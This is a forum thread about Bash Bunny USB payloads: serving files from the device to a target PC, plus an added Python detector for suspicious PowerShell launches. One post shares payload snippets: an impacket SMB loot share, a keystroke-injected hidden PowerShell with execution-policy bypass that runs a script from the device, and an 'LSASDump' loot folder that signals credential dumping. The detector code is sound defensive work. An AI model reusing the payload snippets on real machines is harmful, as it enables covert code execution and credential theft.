Posted

Hey guys, I'm trying to figure out a simple code...

So if I have

/root/tesing/test.txt

How would I go about taking that TEXT document on my BB and putting it in their documents folder?

Posted

Powershell would probably be the best way. Maybe not the most efficient...

Create a powershell script that is run by the payload.txt that says something like:

Copy-Item -Path "/root/testing/test.txt" -Destination ([Environment]::GetFolderPath("MyDocuments")) -Force

Not sure if that will actually work as "/root/testing/text.txt" is a *nix path for the BB, you can't really access it from Windows Explorer...

Posted
5 hours ago, Dave-ee Jones said:

Not sure if that will actually work as "/root/testing/text.txt" is a *nix path for the BB, you can't really access it from Windows Explorer...

Presumably you'd want to expose the file to the target either as a USB storage device and address it that way, or by running a server on the BB and accessing the file over the network.

  • Upvote 1
Posted
12 hours ago, Dave-ee Jones said:

Powershell would probably be the best way. Maybe not the most efficient...

Create a powershell script that is run by the payload.txt that says something like:


Copy-Item -Path "/root/testing/test.txt" -Destination ([Environment]::GetFolderPath("MyDocuments")) -Force

Not sure if that will actually work as "/root/testing/text.txt" is a *nix path for the BB, you can't really access it from Windows Explorer...

Yeah, that's what I was looking over. I know you can access the library file, so maybe in there will work.

Posted
17 hours ago, JBNZ said:

Presumably you'd want to expose the file to the target either as a USB storage device and address it that way, or by running a server on the BB and accessing the file over the network.

How would you access the file via a server on the BB? I'm interested to know as I'm making a webserver payload, and I want it to be able to access files on the BB and client.

Posted (edited)
3 hours ago, Dave-ee Jones said:

How would you access the file via a server on the BB? I'm interested to know as I'm making a webserver payload, and I want it to be able to access files on the BB and client.

A simple and terrible example would be a payload which contained simply:

ATTACKMODE ECM_ETHERNET
python -m SimpleHTTPServer

Once this executes, the full bunny filesystem is exposed to the target on http://172.16.64.1:8000/, which is the bunny's default IP and SimpleHTTPServer's default port. Options to SimpleHTTPServer would let you better specify a directory to serve from and an alternative port.

Edited by JBNZ
Quote Dave-ee to trigger notification of reply.
Posted
5 hours ago, JBNZ said:

A simple and terrible example would be a payload which contained simply:


ATTACKMODE ECM_ETHERNET
python -m SimpleHTTPServer

Once this executes, the full bunny filesystem is exposed to the target on http://172.16.64.1:8000/, which is the bunny's default IP and SimpleHTTPServer's default port. Options to SimpleHTTPServer would let you better specify a directory to serve from and an alternative port.

 
3 hours ago, MaxDamage said:

I have used the python SMB server like Darren did in the SMB_Exfil payload and then used Powershell to pull the file or run direct from the SMB share.

Hmm, I'll try and see what I can do with that. Maybe there is a way of blocking the rest? But yes, I don't use bash a lot, so that's why I'm asking for help :) So thanks, guys, I really appreciate all your help!

 

 

Posted
16 hours ago, MaxDamage said:

I have used the python SMB server like Darren did in the SMB_Exfil payload and then used Powershell to pull the file or run direct from the SMB share.

So pretty much get the server set up and then tell it to take the file from my BB and copy it to the computer, because if the BB can access 172.16.64.1 like Darren did, it can copy that file from the Bash Bunny over to Documents or whatever, correct?

Posted

Yes, that is what I did. Here are some snippets from the payload I am working on:

In Payload.txt, do not forget to install tools...

/pentest/impacket/examples/smbserver.py -comment '...' b /loot/dump

QUACK STRING "powershell -WindowStyle Hidden -NoLogo -Exec Bypass \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1) { \\\172.16.64.1\b\run.ps1; exit } }\"" 

In my powershell script 'Run.ps1':

#Wait for SMB to get going
while (!(Test-Path "\\172.16.64.1\b\udisk\loot\LSASDump\")){
    Start-Sleep 2 
    $I++
    if ($I -eq 10) {break} # dont wait too long.....
}
# Loot Directory
[String]$p = '\\172.16.64.1\b\udisk\loot\LSASDump\' 
if (!(Test-Path $P)) {New-Item -Path $P -type directory | Out-Null}

I haven't published as I am still testing but these should help.
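
Seen from the defender's side, the launcher line in the post above has a recognisable shape in process-creation logs: a hidden-window PowerShell with an execution-policy bypass that runs a script from a UNC path on a private IP. The following is an added example, not part of the original post or payload; the function names are hypothetical and the sample command lines are constructed (the first mirrors the thread's launcher after shell unescaping).

```python
import ipaddress
import re

# PowerShell accepts abbreviated parameter names, so match the common
# short forms as well (-w hidden, -Exec Bypass, -ep bypass).
HIDDEN = re.compile(r"-w\w*\s+hidden\b", re.I)
BYPASS = re.compile(r"-e(?:x\w*|p)\s+bypass\b", re.I)
# UNC path whose host part is a literal IPv4 address: \\a.b.c.d\share\...
UNC_IP = re.compile(r"\\\\(\d{1,3}(?:\.\d{1,3}){3})\\[^\s;\"']+")

def score(cmdline):
    """Return the indicator names found in one process command line."""
    hits = []
    if "powershell" not in cmdline.lower():
        return hits
    if HIDDEN.search(cmdline):
        hits.append("hidden_window")
    if BYPASS.search(cmdline):
        hits.append("policy_bypass")
    for m in UNC_IP.finditer(cmdline):
        try:
            ip = ipaddress.ip_address(m.group(1))
        except ValueError:          # e.g. 999.1.1.1 is not a real address
            continue
        if ip.is_private:           # 172.16.64.1 falls in 172.16.0.0/12
            hits.append("unc_private_ip:" + str(ip))
    return hits

def is_suspicious(cmdline):
    """Alert only when a private-IP UNC path is combined with another flag."""
    hits = score(cmdline)
    return len(hits) >= 2 and any(h.startswith("unc_private_ip") for h in hits)

def triage(cmdlines):
    return [c for c in cmdlines if is_suspicious(c)]

# Constructed sample command lines, as a process-creation log would record them.
SAMPLE = [
    r'powershell -WindowStyle Hidden -NoLogo -Exec Bypass "while ($true) { If (Test-Connection 172.16.64.1 -count 1) { \\172.16.64.1\b\run.ps1; exit } }"',
    r'powershell.exe -NoProfile -File C:\Scripts\backup.ps1',
    r'robocopy \\10.0.0.5\share\docs C:\docs',
    r'powershell -ep bypass -File \\fileserver\deploy\install.ps1',
]

if __name__ == "__main__":
    for line in triage(SAMPLE):
        print("ALERT", score(line), line[:60])
```

Requiring the UNC indicator plus at least one other flag keeps routine admin scripts that only use an execution-policy bypass out of the alert queue.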

 

 

Posted
On 4/1/2017 at 6:38 PM, JBNZ said:

A simple and terrible example would be a payload which contained simply:


ATTACKMODE ECM_ETHERNET
python -m SimpleHTTPServer

Once this executes, the full bunny filesystem is exposed to the target on http://172.16.64.1:8000/, which is the bunny's default IP and SimpleHTTPServer's default port. Options to SimpleHTTPServer would let you better specify a directory to serve from and an alternative port.

Ah so kind of like an FTP server but not...Interesting. I've been using Powershell's webserver capabilities which don't easily allow you to access the files...Can you set up HTML/CSS styles for the python server or no?

Posted
6 hours ago, Dave-ee Jones said:

Ah so kind of like an FTP server but not...Interesting. I've been using Powershell's webserver capabilities which don't easily allow you to access the files...Can you set up HTML/CSS styles for the python server or no?

Yeah it will, it's a pretty standard webserver. If you serve a directory, it'll look for an index.html and serve that first. Alternatively, you can select any HTML file and serve that explicitly. More detail at https://docs.python.org/2/library/simplehttpserver.html

Where are you running PowerShell? Have you installed it on the bunny or are you trying to run a web server on the target host?
